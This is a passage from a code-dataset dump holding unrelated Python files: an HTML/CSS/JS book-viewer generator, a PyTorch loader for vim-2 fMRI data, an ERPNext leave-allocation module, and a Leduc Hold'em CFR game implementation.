\"float:left\"\n )\n css_file += util.addCss(\n \".navbar a\",\n \"display: block\",\n \"color: black\",\n \"font-size: 1.1em\",\n \"font-weight: 300\"\n )\n css_file += util.addCss(\n \".navbar a:hover\",\n \"background: var(--highlight)\",\n \"color:white\"\n )\n css_file += util.addCss(\n \".navbar a\",\n \"padding-top: 5px\",\n \"padding-bottom: 5px\",\n )\n css_file += util.addCss(\n \".navbar a:link\",\n \"text-decoration:none\"\n )\n css_file += util.addCss(\n \".dropdown-container\",\n \"display: none\",\n \"padding-left: 8px\"\n )\n css_file += util.addCss(\n 
\"#exitNavBar\", \"float:right\",\n \"cursor: pointer\"\n )\n css_file += util.addCss(\n \".navButton\",\n \"position: fixed\",\n \"top:10px\",\n \"background-color: var(--primary)\",\n \"width: 75px\",\n \"height: 75px\",\n \"border-radius: 50px\",\n \"grid-column-start: 1\",\n \"box-shadow:2px 2px 8px 2px darkgray\",\n \"cursor: pointer\"\n )\n css_file += util.addCss(\n \".bar\",\n \"width: 35px\",\n \"height: 5px\",\n \"background-color: white\",\n \"margin: 6px 20px\"\n )\n\n css_fd.write(css_file)\n css_fd.close()\n\n js_fd = open(filename + \".js\", \"w+\")\n \n js_file = util.constructString(\n \"function toggle(element){\",\n \"\\tlet obj = document.getElementById(element);\",\n \"\\tobj.style.display = obj.style.display === 'none' ? 'block' : 'none';\",\n \"}\\n\")\n\n js_file += util.constructString(\n \"let x_offset = 0;\",\n \"let y_offset = 0;\\n\",\n \"function beginDrag(e){\",\n \"\\tx_offset = e.clientX\",\n \"\\ty_offset = e.clientY\",\n \"}\\n\"\n\n \"function endDrag(e){\",\n \"\\tlet obj = e.target.parentNode;\",\n \n \"\\tlet x = x_offset - e.clientX;\",\n \"\\tlet y = y_offset - e.clientY;\",\n\n \"\\tobj.style.left = (obj.offsetLeft - x) + \\\"px\\\";\",\n \"\\tobj.style.top = (obj.offsetTop - y) + \\\"px\\\";\",\n \"}\\n\\n\",\n\n \"function dragstart_handler(e) {\",\n \"\\te.dataTransfer.setData(\\\"text/plain\\\", e.target.innerText);\",\n \"}\"\n )\n\n js_file += util.constructString(\n \"function moveToPosition(e, element){\",\n \"\\tlet obj = document.getElementById(element);\",\n \"\\tobj.style.left = e.pageX + 'px';\",\n \"\\tobj.style.top = e.pageY + 'px';\",\n \"}\"\n )\n js_file += util.constructString(\n \"document.addEventListener('DOMContentLoaded', function() {\",\n \"\\tmenuLeft = document.getElementById( 'navbar' );\",\n \"\\tbody = document.body;\",\n \"\\tshowLeft = document.getElementById( 'showLeft' );\",\n \"\\tmenuLeft.style.left = \\\"-500px\\\";\",\n \"\\tvar dropdown = document.getElementsByClassName(\\\"dropdown-btn\\\");\",\n \"\\tvar i;\",\n \"\\tfor (i = 0; i < dropdown.length; i++) {\",\n \"\\t\\tdropdown[i].addEventListener(\\\"click\\\", function() {\",\n \"\\t\\tthis.classList.toggle(\\\"active\\\");\",\n \"\\t\\tvar dropdownContent = this.nextElementSibling;\",\n \"\\t\\tdropdownContent.style.display = dropdownContent.style.display === \\\"none\\\" ? \\\"block\\\" : \\\"none\\\";\"\n \"\\t\\t});\",\n \"\\t}\",\n \"});\\n\"\n )\n js_file += util.constructString(\n \"function toggleNavBar(){\",\n \"\\tmenuLeft.style.left = menuLeft.style.left == \\\"0px\\\" ? 
\\\"-500px\\\" : \\\"0px\\\";\",\n \"}\"\n )\n\n js_fd.write(js_file)\n js_fd.close()\n return html_fd\n\ndef main():\n #get the name of the file to parse\n filename = ''\n if(len(sys.argv) < 2):\n filename = input(\"enter a .book file to parse\\n\")\n else:\n filename = sys.argv[1]\n\n\n #try and open the file\n try:\n fd = open(filename, \"r\")\n except IOError:\n print(\"Could not open \" + filename)\n sys.exit(1)\n\n #remove path and extension from filename\n file_location = os.path.basename(filename)\n filename = os.path.splitext(file_location)[0]\n\n #if the user gave a third param, make the book there\n if(len(sys.argv) == 3):\n try:\n os.chdir(sys.argv[2])\n except FileNotFoundError:\n #make the dir first\n os.mkdir(sys.argv[2])\n os.chdir(sys.argv[2])\n\n #create directories for book if they don't exist\n if not os.path.exists(filename):\n os.mkdir(filename)\n\n os.chdir(filename)\n\n if not os.path.exists(\"media\"):\n os.mkdir(\"media\")\n\n html_fd = initFile(filename)\n\n parser.parse(html_fd, fd)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"350497023","text":"import torch\nimport numpy as np\nfrom PIL import Image\nimport os\nimport glob\nimport random\nimport tqdm\n\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\n\nclass Vim2Dataset(Dataset):\n def __init__(self, root_dir, is_val=False, subject_id=1,\n ignore_voxel_reponse = False,\n voxel_response_transform=None, stimuli_transform=None,\n add_noise=False, pre_resize_stimuli=False,\n debug=False, verbose=False):\n \"\"\"\n Initialised the Vim2Dataset\n Params :\n - root_dir : Root Directory of the dataset\n - is_val : Load the validation set ? Else load the Training set\n - subject_id : Subject ID for voxel response. Can accept [1,2,3]\n - ignore_voxel_reponse : Do not load voxel response (and pass random values) : False\n - voxel_response_transform : pytorch transform to be applied to voxel response\n - stimuli_transform : pytorch transform to be applied to the stimuli\n - add_noise : Either holds False when disabled, or [x,y] denoting the range in which to add noise\n - imsize : Resize stimuli images after loading to save time during training. 
(default : False)\n - debug : Print debug messages, return random tensors in debug mode\n - verbose : Boolean value indicating if we want to print logs in verbose mode\n \"\"\"\n self.root_dir = root_dir\n self.is_val=is_val\n self.subject_id = subject_id\n self.ignore_voxel_reponse = ignore_voxel_reponse\n self.voxel_response_transform = voxel_response_transform\n self.stimuli_transform = stimuli_transform\n self.add_noise = add_noise\n self.pre_resize_stimuli = pre_resize_stimuli\n self.debug = debug\n self.verbose = verbose\n\n self.stimuli_capture_frequency = 15 # 15 Hertz\n\n if not self.debug:\n self.validate_root_dir()\n assert self.subject_id in [1,2, 3]\n\n self.load_stimuli()\n if not self.ignore_voxel_reponse:\n self.load_voxel_response()\n\n def load_stimuli(self):\n if self.is_val:\n self.stimuli_path = os.path.join(self.root_dir, \"validation_stimuli.npy\")\n else:\n self.stimuli_path = os.path.join(self.root_dir, \"training_stimuli.npy\")\n\n if self.verbose:\n print(\"Loading Stimuli from : \", self.stimuli_path)\n\n self.stimuli = np.load(self.stimuli_path).astype(np.uint8)\n if self.pre_resize_stimuli:\n resized_stimuli_shape = [self.stimuli.shape[0]] + list(self.pre_resize_stimuli) + [self.stimuli.shape[-1]]\n self.resized_stimuli = np.zeros( resized_stimuli_shape ) # N, H, W, C\n for _idx in tqdm.tqdm(range(self.stimuli.shape[0])):\n im = Image.fromarray(np.uint8(self.stimuli[_idx]))\n im = im.resize(self.pre_resize_stimuli, resample=Image.NEAREST)\n self.resized_stimuli[_idx] = np.array(im).astype(np.uint8)\n del self.stimuli\n self.stimuli = self.resized_stimuli\n\n\n def load_voxel_response(self):\n if self.is_val:\n self.voxel_response_path = os.path.join(\n self.root_dir,\n \"VoxelResponses_subject{}_validation.npz\".format(self.subject_id)\n )\n else:\n self.voxel_response_path = os.path.join(\n self.root_dir,\n \"VoxelResponses_subject{}_training.npz\".format(self.subject_id)\n )\n\n if self.verbose:\n print(\"Loading Voxel Responses for Subject {} from : {}\".format(\\\n self.subject_id, self.voxel_response_path))\n\n self.voxel_responses = np.load(self.voxel_response_path)[\"arr_0\"]\n\n def __len__(self):\n if self.debug:\n return 1000\n else:\n return len(self.stimuli)\n\n def __getitem__(self, idx):\n # Obtain and prepare stimuli\n stimuli = self.stimuli[idx] # C x H x W\n stimuli = Image.fromarray(stimuli.astype('uint8'))\n\n if self.stimuli_transform:\n stimuli = self.stimuli_transform(stimuli)\n\n # Respons with the same voxel for all 15 stimuli captured at the timepoint\n if not self.ignore_voxel_reponse:\n voxel_response = self.voxel_responses[int(idx/self.stimuli_capture_frequency)]\n if self.voxel_response_transform:\n voxel_response = self.voxel_response_transform(voxel_response)\n\n voxel_response = torch.FloatTensor(voxel_response).unsqueeze(0)\n if self.add_noise:\n noise = torch.Tensor(1, 18, 64, 64)\n noise = torch.FloatTensor(1, 18, 64, 64).normal_(\n self.add_noise[0],\n self.add_noise[1]\n )\n voxel_response = torch.add(voxel_response, noise)\n else:\n voxel_response = torch.rand(1, 18, 64, 64)\n # shape : [1, 18, 64, 64] Depth x Width x Height\n # which gets added by the batch_size to finally become :\n # [batch_size, 1, 18, 64, 64]\n # where 1 is the number of channels\n return stimuli, voxel_response\n\n # im = Image.open(self.files[idx])\n # if self.transform is not None:\n # im = self.transform(im)\n # label = self.labels[idx]\n\n def validate_root_dir(self):\n expected_files = [ \\\n 'validation_stimuli.npy', \\\n 
'training_stimuli.npy', \\\n 'VoxelResponses_subject1_training.npz', \\\n 'VoxelResponses_subject1_validation.npz', \\\n 'VoxelResponses_subject2_training.npz', \\\n 'VoxelResponses_subject2_validation.npz', \\\n 'VoxelResponses_subject3_training.npz',\\\n 'VoxelResponses_subject3_validation.npz']\n\n for _expected_file in expected_files:\n assert os.path.exists(os.path.join(self.root_dir, _expected_file))\n\nif __name__ == \"__main__\":\n\n # stimuli_transforms = transforms.Compose([\n # transforms.Resize((64, 64)),\n # transforms.ToTensor(),\n # transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n # ])\n stimuli_transforms = transforms.Compose([\n # transforms.Resize((64, 64)),\n transforms.ToTensor(),\n # transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n\n voxel_response_transforms = transforms.Compose([\n ])\n dataset = Vim2Dataset( \"data/vim-2\",\n subject_id=1,\n is_val=True,\n stimuli_transform = stimuli_transforms,\n voxel_response_transform=voxel_response_transforms,\n ignore_voxel_reponse = True,\n pre_resize_stimuli=(64, 64),\n debug=False,\n verbose=True)\n\n stimuli, voxel_response = dataset[0]\n print(\"Voxel Response \", voxel_response.shape, \" Stimuli : \", stimuli.shape)\n print(\"Voxel Response Mean \", voxel_response.mean(), \" Stimuli Mean : \", stimuli.mean())\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=100, shuffle=True)\n _idx = 0\n from tensorboardX import SummaryWriter\n\n writer = SummaryWriter(log_dir=\"./logs/gan_fMRI__run-1/\")\n import torchvision.utils as vutils\n\n _idx = 0\n for stimuli, voxel_response in data_loader:\n print(_idx, voxel_response.shape, stimuli.shape)\n std_coeff = torch.Tensor(stimuli.shape).fill_(0.5)\n mean_coeff = torch.Tensor(stimuli.shape).fill_(0.5)\n unint8_coeff = torch.Tensor(stimuli.shape).fill_(255.0)\n #\n real_images = torch.mul(stimuli, std_coeff)\n real_images = torch.add(real_images, mean_coeff)\n real_images = torch.mul(real_images, unint8_coeff)\n #\n real_images = stimuli[0:3]\n images = vutils.make_grid(torch.FloatTensor(real_images), normalize=True, scale_each=False)\n writer.add_image(\"/debug/image\", images, _idx)\n _idx += 1\n print(\"Actual Length : \", len(dataset))\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"283102706","text":"# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors\n# License: GNU General Public License v3. 
See license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.utils import cint, flt\nfrom frappe import _\nfrom frappe.model.document import Document\nfrom erpnext.hr.utils import set_employee_name\n\nclass LeaveAllocation(Document):\n\tdef validate(self):\n\t\tself.validate_new_leaves_allocated_value()\n\t\tself.check_existing_leave_allocation()\n\t\tif not self.total_leaves_allocated:\n\t\t\tself.total_leaves_allocated = self.new_leaves_allocated\n\n\t\tset_employee_name(self)\n\n\tdef on_update_after_submit(self):\n\t\tself.validate_new_leaves_allocated_value()\n\n\tdef on_update(self):\n\t\tself.get_total_allocated_leaves()\n\n\tdef on_cancel(self):\n\t\tself.check_for_leave_application()\n\n\tdef validate_new_leaves_allocated_value(self):\n\t\t\"\"\"validate that leave allocation is in multiples of 0.5\"\"\"\n\t\tif flt(self.new_leaves_allocated) % 0.5:\n\t\t\tfrappe.throw(_(\"Leaves must be allocated in multiples of 0.5\"))\n\n\tdef check_existing_leave_allocation(self):\n\t\t\"\"\"check whether leave for same type is already allocated or not\"\"\"\n\t\tleave_allocation = frappe.db.sql(\"\"\"select name from `tabLeave Allocation`\n\t\t\twhere employee=%s and leave_type=%s and fiscal_year=%s and docstatus=1\"\"\",\n\t\t\t(self.employee, self.leave_type, self.fiscal_year))\n\t\tif leave_allocation:\n\t\t\tfrappe.msgprint(_(\"Leaves for type {0} already allocated for Employee {1} for Fiscal Year {0}\").format(self.leave_type,\n\t\t\t\tself.employee, self.fiscal_year))\n\t\t\tfrappe.throw('{0}'.format(leave_allocation[0][0]))\n\n\tdef get_leave_bal(self, prev_fyear):\n\t\treturn self.get_leaves_allocated(prev_fyear) - self.get_leaves_applied(prev_fyear)\n\n\tdef get_leaves_applied(self, fiscal_year):\n\t\tleaves_applied = frappe.db.sql(\"\"\"select SUM(ifnull(total_leave_days, 0))\n\t\t\tfrom `tabLeave Application` where employee=%s and leave_type=%s\n\t\t\tand fiscal_year=%s and docstatus=1\"\"\",\n\t\t\t(self.employee, self.leave_type, fiscal_year))\n\t\treturn leaves_applied and flt(leaves_applied[0][0]) or 0\n\n\tdef get_leaves_allocated(self, fiscal_year):\n\t\tleaves_allocated = frappe.db.sql(\"\"\"select SUM(ifnull(total_leaves_allocated, 0))\n\t\t\tfrom `tabLeave Allocation` where employee=%s and leave_type=%s\n\t\t\tand fiscal_year=%s and docstatus=1 and name!=%s\"\"\",\n\t\t\t(self.employee, self.leave_type, fiscal_year, self.name))\n\t\treturn leaves_allocated and flt(leaves_allocated[0][0]) or 0\n\n\tdef allow_carry_forward(self):\n\t\t\"\"\"check whether carry forward is allowed or not for this leave type\"\"\"\n\t\tcf = frappe.db.sql(\"\"\"select is_carry_forward from `tabLeave Type` where name = %s\"\"\",\n\t\t\tself.leave_type)\n\t\tcf = cf and cint(cf[0][0]) or 0\n\t\tif not cf:\n\t\t\tfrappe.db.set(self,'carry_forward',0)\n\t\t\tfrappe.throw(_(\"Cannot carry forward {0}\").format(self.leave_type))\n\n\tdef get_carry_forwarded_leaves(self):\n\t\tif self.carry_forward:\n\t\t\tself.allow_carry_forward()\n\t\tprev_fiscal_year = frappe.db.sql(\"\"\"select name from `tabFiscal Year`\n\t\t\twhere year_start_date = (select date_add(year_start_date, interval -1 year)\n\t\t\t\tfrom `tabFiscal Year` where name=%s)\n\t\t\torder by name desc limit 1\"\"\", self.fiscal_year)\n\t\tprev_fiscal_year = prev_fiscal_year and prev_fiscal_year[0][0] or ''\n\t\tprev_bal = 0\n\t\tif prev_fiscal_year and cint(self.carry_forward) == 1:\n\t\t\tprev_bal = self.get_leave_bal(prev_fiscal_year)\n\t\tret = {\n\t\t\t'carry_forwarded_leaves': 
prev_bal,\n\t\t\t'total_leaves_allocated': flt(prev_bal) + flt(self.new_leaves_allocated)\n\t\t}\n\t\treturn ret\n\n\tdef get_total_allocated_leaves(self):\n\t\tleave_det = self.get_carry_forwarded_leaves()\n\t\tfrappe.db.set(self,'carry_forwarded_leaves',flt(leave_det['carry_forwarded_leaves']))\n\t\tfrappe.db.set(self,'total_leaves_allocated',flt(leave_det['total_leaves_allocated']))\n\n","sub_path":"python/erpnext/2015/4/leave_allocation.py","file_name":"leave_allocation.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"265245976","text":"# coding: utf-8\n\nimport cfr_game\nimport numpy as np\nfrom cfr_game import CFRGame\n\n# LeducHoldEm is the following game.\n# The deck consists of (J, J, Q, Q, K, K).\n# Each player gets 1 card. There are two betting rounds and the number of raises in each round is at most 2.\n# In the second round, one card is revealed on the table and is used to create a hand.\n# There are two types of hands: pairs and highest card. There are three actions: fold, call and raise.\n# Each of the two players antes 1. In the first round, the betting amount is 2 (including the ante for the first bet).\n# In round 2 it is 4.\n# Player 1 starts round 1 and player 2 starts round 2.\n\n# Betting in Poker:\n# Bet: place a wager into the pot, or raise, by matching the outstanding bet and placing an extra bet into the pot.\n# Call: matching the amount of all outstanding bets (or check, by passing when there is no bet)\n# Fold: pass when there is an outstanding bet and forfeiting the current game.\n\n# So keep track of whether the previous player called or not. Note that the big blind is an initial bet.\n\n# Actions are: 0 - fold\n# 1 - call\n# 2 - raise\n\n# Rounds: 1 - pre-flop\n# 2 - flop\n\n# A dictionary that returns the other player.\nother_player = {1: 2, 2: 1}\n\nclass LeducCFR(CFRGame):\n\t# We interpret an empty action sequence as meaning the root of the game.\n\t# The next step is to sample the cards for the two players.\n\n\t# The deck is J, J, Q, Q, K, K. We represent J = 11, Q = 12, K = 13.\n\tdeck = [11,11,12,12,13,13]\n\tmax_raises_per_round = 2\n\tnum_rounds = 2\n\n\t# We just make a dictionary with the available actions (assuming a 2 raise maximum).\n\t# If the bet sequence isn't in this dictionary, it is invalid.\n\t# If we want to have a larger raise maximum, we should just make a tree to parse the\n\t# bet sequence, but this will do for now.\n\tavailable_actions_dict = {\n\t\t(): [1,2],\n\t\t(1,): [1,2],\n\t\t(1, 1): [],\n\t\t(1, 2): [0,1,2],\n\t\t(1, 2, 0): [],\n\t\t(1, 2, 1): [],\n\t\t(1, 2, 2): [0, 1],\n\t\t(1, 2, 2, 0): [],\n\t\t(1, 2, 2, 1): [],\n\n\t\t(2,): [0,1,2],\n\t\t(2, 0): [],\n\t\t(2, 1): [],\n\t\t(2, 2): [0, 1],\n\t\t(2, 2, 0): [],\n\t\t(2, 2, 1): []\n\t}\n\n\t# We represent actions as: fold = 0, call/check = 1, bet/raise = 2.\n\n\tdef __init__(self):\n\t\tself.reset()\n\n\t@staticmethod\n\tdef interpret_history(history):\n\t\t\"\"\" Validate the action sequence -- check it makes sense. 
If it's invalid, return an empty dictionary.\n\t\tOtherwise, returns a dictionary with: player to play, current pot, is it terminal, the information set.\n\t\t\"\"\"\n\t\tif len(history) == 0:\n\t\t\treturn [], []\n\n\t\t# A history of length 1 or 2 must consist of the hole cards.\n\t\tif len(history) <= 2:\n\t\t\tcards = history[:]\n\t\t\tfor card in cards:\n\t\t\t\tassert card in LeducCFR.deck\n\t\t\treturn cards, []\n\n\t\t# We first split into betting rounds.\n\t\t# Valid betting rounds are, as strings,\n\t\t# 'cc' <- first player called and second player checked.\n\t\t# 'r'**n + 'c', where n <= max_raises <- a sequence of n raises followed by a call.\n\t\t# 'r'**n + 'f', where n <= max_raises <- a sequence of n raises followed by a fold.\n\t\t# Note that even if n == max_raises, the last action played must be to call, so that\n\t\t# the next round is reached with both players having made equal bets.\n\n\t\tbet_sequences = []\n\t\tbet_sequence = []\n\t\tcards = []\n\t\tfor a in history:\n\t\t\tif not a in LeducCFR.deck:\n\t\t\t\tbet_sequence.append(a)\n\t\t\telse:\n\t\t\t\tcards.append(a)\n\t\t\t\tif len(bet_sequence) > 0:\n\t\t\t\t\tbet_sequences.append(bet_sequence)\n\t\t\t\t\tbet_sequence = []\n\t\t\n\t\t# We can also have a bet sequence without having drawn a card, and still need to add\n\t\t# this to bet_sequences.\n\t\tif len(bet_sequence) > 0:\n\t\t\tbet_sequences.append(bet_sequence)\n\n\t\t# Now interpret the bet sequences. There are either 0, 1 or 2 in a valid sequence\n\t\treturn cards, bet_sequences\n\n\t@staticmethod\n\tdef compute_bets(bet_sequences):\n\t\t\"\"\" Given 0, 1 or 2 bet sequences, compute the current bets by players 1 and 2.\n\t\t\"\"\"\n\t\t# Both players ante 1\n\t\tbets = {1: 1, 2: 1}\n\n\t\tassert len(bet_sequences) <= 2\n\n\t\tfor i, bet_sequence in enumerate(bet_sequences):\n\t\t\t# Player 1 starts the round 1 and player 2 starts round 2.\n\t\t\tplayer = 1 if i == 0 else 2\n\t\t\t# The raise amount is 2 in the first round and 4 in the second round.\n\t\t\traise_amount = 2 if i == 0 else 4\n\t\t\tfor bet_action in bet_sequence:\n\t\t\t\tif bet_action == 0:\n\t\t\t\t\t# Fold\n\t\t\t\t\treturn bets\n\t\t\t\telif bet_action == 1:\n\t\t\t\t\t# Check/call\n\t\t\t\t\t# Update the bet of the current player to equal the bet of the other player\n\t\t\t\t\tbets[player] = bets[other_player[player]]\n\t\t\t\telif bet_action == 2:\n\t\t\t\t\t# Bet/Raise\n\t\t\t\t\t# First call the bet of the other player, and then add the betting amount to\n\t\t\t\t\t# player's bet.\n\t\t\t\t\tbets[player] = bets[other_player[player]]\n\t\t\t\t\tbets[player] += raise_amount\n\t\t\t\t# Switch players\n\t\t\t\tplayer = other_player[player]\n\t\treturn bets\n\n\t@staticmethod\n\tdef available_actions(history):\n\t\tcards, bet_sequences = LeducCFR.interpret_history(history)\n\t\t# If no bet sequences so far, then there better be two hole cards, and\n\t\t# we can set bet_sequence as []\n\t\tif len(bet_sequences) == 0:\n\t\t\tassert len(cards) == 2\n\t\t\tbet_sequence = []\n\t\telse:\n\t\t\t# If 1 bet sequence so far then we are either part way through the bet\n\t\t\t# sequence, or we have finished it. 
If we have finished it, then there\n\t\t\t# better be three cards drawn and we can set the bet sequence as [].\n\t\t\tif len(bet_sequences) == 1:\n\t\t\t\tif len(cards) == 3:\n\t\t\t\t\tbet_sequence = []\n\t\t\t\telse:\n\t\t\t\t\t# Only part way through first round.\n\t\t\t\t\tbet_sequence = bet_sequences[-1]\n\t\t\telif len(bet_sequences) == 2:\n\t\t\t\t# If 2 bet sequence then we are partway through the last round\n\t\t\t\tbet_sequence = bet_sequences[-1]\n\t\treturn LeducCFR.available_actions_bet_sequence(bet_sequence)\n\n\t@staticmethod\n\tdef available_actions_bet_sequence(bet_sequence):\n\t\t\"\"\" Given a single bet sequence (for one round), returns the available actions.\n\t\t\"\"\"\n\t\tbet_sequence_tuple = tuple(bet_sequence)\n\t\tassert bet_sequence_tuple in LeducCFR.available_actions_dict\n\t\treturn LeducCFR.available_actions_dict[bet_sequence_tuple]\n\n\t@staticmethod\n\tdef payoffs(history):\n\t\t\"\"\" If the action sequence is terminal, returns the payoffs for players\n\t\t1 and 2 in a dictionary with keys 1 and 2.\n\t\t\"\"\"\n\t\tassert LeducCFR.is_terminal(history)\n\n\t\tcards, bet_sequences = LeducCFR.interpret_history(history)\n\t\thole_cards = {1: cards[0], 2: cards[1]}\n\n\t\tbets = LeducCFR.compute_bets(bet_sequences)\n\n\t\t# We have reached a terminal node, so we have to decide who won and give them the whole pot.\n\t\tpot = bets[1] + bets[2]\n\n\t\t# If 1 and 2 have the same hole cards, it's a draw, so split the pot. This means\n\t\t# both players gain 0, since they have the same amount in the pot.\n\t\tif hole_cards[1] == hole_cards[2]:\n\t\t\treturn {1: 0, 2: 0}\n\n\t\t# If the last action in the game was a fold, then that player loses and the other wins\n\t\t# The first player in round 2 is 2. Hence the last player is 2 if there are an even number of moves\n\t\t# and otherwise 1.\n\n\t\tif bet_sequences[0][-1] == 0:\n\t\t\t# If the last action in bet_sequences[0] is a fold, the game is over and the other player wins.\n\t\t\tlast_player = 1 if len(bet_sequences[0]) % 2 == 0 else 2\n\t\t\twinner = other_player[last_player]\n\t\telif bet_sequences[1][-1] == 0:\n\t\t\t# If the last action in bet_sequences[1] is a fold, then the game is over and the other player wins.\n\t\t\tlast_player = 2 if len(bet_sequences[1]) % 2 == 0 else 1\n\t\t\twinner = other_player[last_player]\n\t\telse:\n\t\t\t# Otherwise the last action was a call, so it goes to a showdown.\n\t\t\tflop = cards[2]\n\t\t\tif hole_cards[1] == flop:\n\t\t\t\twinner = 1\n\t\t\telif hole_cards[2] == flop:\n\t\t\t\twinner = 2\n\t\t\telse:\n\t\t\t\t# There is no pair, so the winner is the one with highest card. 
We already checked the\n\t\t\t\t# hole cards aren't equal.\n\t\t\t\twinner = 1 if hole_cards[1] > hole_cards[2] else 2\n\n\t\treturn {winner: float(pot)/2.0, other_player[winner]: -float(pot)/2.0}\n\n\t@staticmethod\n\tdef is_terminal(history):\n\t\t\"\"\" Return whether the history is terminal\n\t\t\"\"\"\n\t\t_, bet_sequences = LeducCFR.interpret_history(history)\n\t\treturn LeducCFR.is_terminal_bet_sequences(bet_sequences)\n\n\t@staticmethod\n\tdef is_terminal_bet_sequences(bet_sequences):\n\t\t\"\"\" Returns True/False if the bet_sequences is terminal or not.\n\t\t\"\"\"\n\t\t# We just check that there are no available actions to a player in the\n\t\t# last bet sequence.\n\t\t# A terminal bet sequences occurs if any player folded, or if we are in the second\n\t\t# bet sequence and there are no available actions.\n\t\tassert len(bet_sequences) <= 2\n\t\tif len(bet_sequences) == 0:\n\t\t\treturn False\n\t\telif len(bet_sequences) == 1:\n\t\t\t# If there is one bet sequence, then it is terminal if and only if the last\n\t\t\t# action was to fold.\n\t\t\tif bet_sequences[0][-1] == 0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\t# If the last action wasn't to fold, then we continue to the next round.\n\t\t\t\treturn False\n\t\tbet_sequence_tuple = tuple(bet_sequences[-1])\n\t\treturn len(LeducCFR.available_actions_dict[bet_sequence_tuple]) == 0\n\n\t@staticmethod\n\tdef which_player(history):\n\t\t\"\"\" Returns the player who is to play following the action sequence.\n\t\tReturns an error if played on a terminal history.\n\t\t\"\"\"\n\t\tassert not LeducCFR.is_terminal(history)\n\n\t\tcards, bet_sequences = LeducCFR.interpret_history(history)\n\n\t\t# If the hole cards haven't been drawn yet, then sample these\n\t\tif len(cards) < 2:\n\t\t\treturn 0\n\n\t\t# Else the hole cards have been drawn. If no bet sequences, then it's\n\t\t# player 1's turn to play first\n\t\tif len(bet_sequences) == 0:\n\t\t\treturn 1\n\t\telif len(bet_sequences) == 1:\n\t\t\t# If there is a single bet sequence so far, it is either finished\n\t\t\t# (in which case it's chance's turn to draw the flop), or it isn't\n\t\t\t# finished, and one of the players still has to play. Or it is finished\n\t\t\t# and the flop card has already been drawn.\n\t\t\tavailable_actions = LeducCFR.available_actions_bet_sequence(bet_sequences[0])\n\t\t\tif len(available_actions) == 0:\n\t\t\t\t# Either the flop card has been drawn already or it hasn't.\n\t\t\t\tif history[-1] in LeducCFR.deck:\n\t\t\t\t\t# The last move in the history was the flop, so it's player 2 to \n\t\t\t\t\t# start round 2.\n\t\t\t\t\treturn 2\n\t\t\t\telse:\n\t\t\t\t\t# The last move in the history was a player ending the betting round,\n\t\t\t\t\t# so it's chance's turn to draw the flop.\n\t\t\t\t\treturn 0\n\t\t\telse:\n\t\t\t\treturn 1 if len(bet_sequences[0]) % 2 == 0 else 2\n\t\telse:\n\t\t\t# Otherwise there are two bet sequences, and we return the player to\n\t\t\t# play. Make sure it's not a terminal node. 
Since player 2 plays first\n\t\t\t# in round 2, it's player 2 to play if and only if an even number of\n\t\t\t# actions have been played in the second bet sequence.\n\t\t\tbet_sequence_tuple = bet_sequences[1]\n\t\t\tavailable_actions = LeducCFR.available_actions_bet_sequence(bet_sequence_tuple)\n\t\t\tassert len(available_actions) > 0\n\t\t\treturn 2 if len(bet_sequences[1]) % 2 == 0 else 1\n\n\t@staticmethod\n\tdef sample_chance_action(history):\n\t\t\"\"\" If the player for the game state corresponding to the action\n\t\tsequence is the chance player, then sample one of the available actions.\n\t\tReturn the action.\n\t\t\"\"\"\n\t\tcards, bet_sequences = LeducCFR.interpret_history(history)\n\n\t\t# Assert that it is the chance player to play.\n\t\tassert LeducCFR.which_player(history) == 0\n\n\t\t# Copy the Leduc deck and remove cards that have already been drawn.\n\t\tdeck = LeducCFR.deck[:]\n\t\tfor card in cards:\n\t\t\tdeck.remove(card)\n\n\t\t# Just sample a card from the deck.\n\t\treturn np.random.choice(deck)\n\n\t@staticmethod\n\tdef information_set(history):\n\t\t\"\"\" Returns a unique hashable identifier for the information set\n\t\tcontaining the action sequence. This could be a tuple with the\n\t\tactions that are visible to the player. The information set belongs\n\t\tto the player who is to play following the action sequence.\n\t\t\"\"\"\n\t\tplayer = LeducCFR.which_player(history)\n\n\t\tassert player in [1,2]\n\t\tif player == 1:\n\t\t\treturn tuple([history[0]] + history[2:])\n\t\telse:\n\t\t\treturn tuple([history[1]] + history[2:])\n\n\tdef reset(self):\n\t\t\"\"\" Resets the game, and returns the information set and player to play.\n\t\tChance actions are automatically taken.\n\t\t\"\"\"\n\t\tself.history = []\n\t\twhile LeducCFR.which_player(self.history) == 0:\n\t\t\tself.history.append(LeducCFR.sample_chance_action(self.history))\n\n\t\tif LeducCFR.is_terminal(self.history):\n\t\t\tterminal = True\n\t\t\tpayoffs = LeducCFR.payoffs(self.history)\n\t\t\tplayer = None\n\t\t\tinformation_set = None\n\t\telse:\n\t\t\tterminal = False\n\t\t\tpayoffs = None\n\t\t\tplayer = LeducCFR.which_player(self.history)\n\t\t\tinformation_set = LeducCFR.information_set(self.history)\n\n\t\treturn player, information_set, terminal, payoffs\n\n\tdef play_action(self, action):\n\t\t\"\"\" Play the action in the game. 
